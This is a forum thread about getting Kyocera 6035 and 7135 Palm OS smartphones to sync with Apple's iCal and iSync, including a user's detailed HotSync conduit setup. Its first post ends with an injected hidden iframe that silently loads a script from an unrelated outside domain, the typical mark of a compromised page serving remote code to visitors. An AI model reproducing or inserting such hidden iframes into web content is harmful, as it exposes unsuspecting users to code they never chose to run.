Using iCal and iSync with the Kyo 6035

It will be a few more weeks until we can really begin this thread in earnest, but I wanted to give us a place to discuss using Apple's new iCal (Calendaring program with To-Do functionality) and iSync (synchronization program which will allow syncing between iCal, Apple's Address Book, and any device) with the Kyocera 6035 and 7135 Smartphones.

For those not in the know, these two apps are due out as part of MacOS X 10.2. iCal came out a few weeks ago and is already gettin fairly good reviews (though it can be very slow) and iSync is due out in early October (in beta form). Apple claims they will allow a Mac to sync with ANY digital device out there, so that you can keep a SINGLE address book for all of the devices and use your Mac as a digital hub.

Anyway, I wanted to get something started now, so that when these products premiere we will have been ready for the change. There are a lot of MacOS X users on this board, and this could be a fun time for us all.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

6035 can not iSync?

THE GOOD NEWS:
Apple's new iSync Beta has iSync been released for MacOS X 10.2 It is being very well reviewed, thus far.

THE BAD NEWS:
Apple's "supported devices" list indicates "Palm OS devices from Palm or Handspring running Palm OS 4.0 or later and Palm Desktop 4.0 or later for Mac OS X." The 6035 can support 3.5.3 at max. Therefore, the 6035 may never be iSync compatible. We will need to carefully watch the iSync discussion boards to find out.

But for now, this Mad Scientist will wait and see.

THE BEST NEWS:
But the 7135 will be running 4.1, so it should work just fine

Anyone wanting to find out for yourself, you can download here.

Maybe I spoke too soon. Discussions here on the discussion board and here on Macslash indicate 3.X Palms sync just fine. Maybe I'll do some careful backups and try it in my lab sometime this week.

My Success!

Yes it does sync fine with our 6035's.

First, getting the 6035 to sync at all with Palm Desktop 4.0.
- I've got the Keyspan Serial to USB PDA adapter. Installed OS X drivers for it. Restarted and plugged in the adapter and my cradle. Go into System Prefs, into the Network pane. It detects a new port and bang you've got the Keyspan serial port recognized. Leave it as ppp for TCP.
- HotSync Manager Setup. I leave it always disabled, until I'm ready to sync, then I enable it and quit the app. Connection settings, everything is deselected except the wierd looking usa19q..... which is my serial port from the keyspan adapter. It may be something else for you.
- So hotsync is disabled. Ready to sync. Launch Hotsync manager, enable it and quit. Do my sync, works great and finishes. I reopen HotSync and disable it again and quit until the next time I need to sync.

iSync.
- Install software. May need restart.
- Open Palm Desktop. Go to Conduit settings from the Hot Sync menu.
- isync conduit should appear. Go to it's settings and check what you want, ie sync contacts and calendar. Force Slow sync should be off and device type is Palm V. OK
- The next ones are key. Go into Address Book, DateBook, Memo Pad, and To Do List settings and change those to "Do Nothing." That's what's gonna make everything work. Done
-Open iSync and you should be able to add your palm device from the Device menu.
- Syncing with .Mac or an iPod, you hit the sync now button in iSync.
- To sync the phone, you just hit the sync button on your cradle, Hot sync opens and syncs any other info using palm desktop, but iSync will do all of the syncing for your address book, iCal and To Do items (iCal as well)

can you still sync third party apps with isync. Specifically, I would like to use iSync, but I need to keep pocket quicken & docs to go on my palm updated. Can I still use those with ical & the address book app?

Yes. iSync (when used with the Palm) uses the regular Palm conduits. It replaces those for the Palm Desktop with iCal and the Address Book, but the others should still be intact. Now I have not used it myself yet, but the info seems pretty solid.
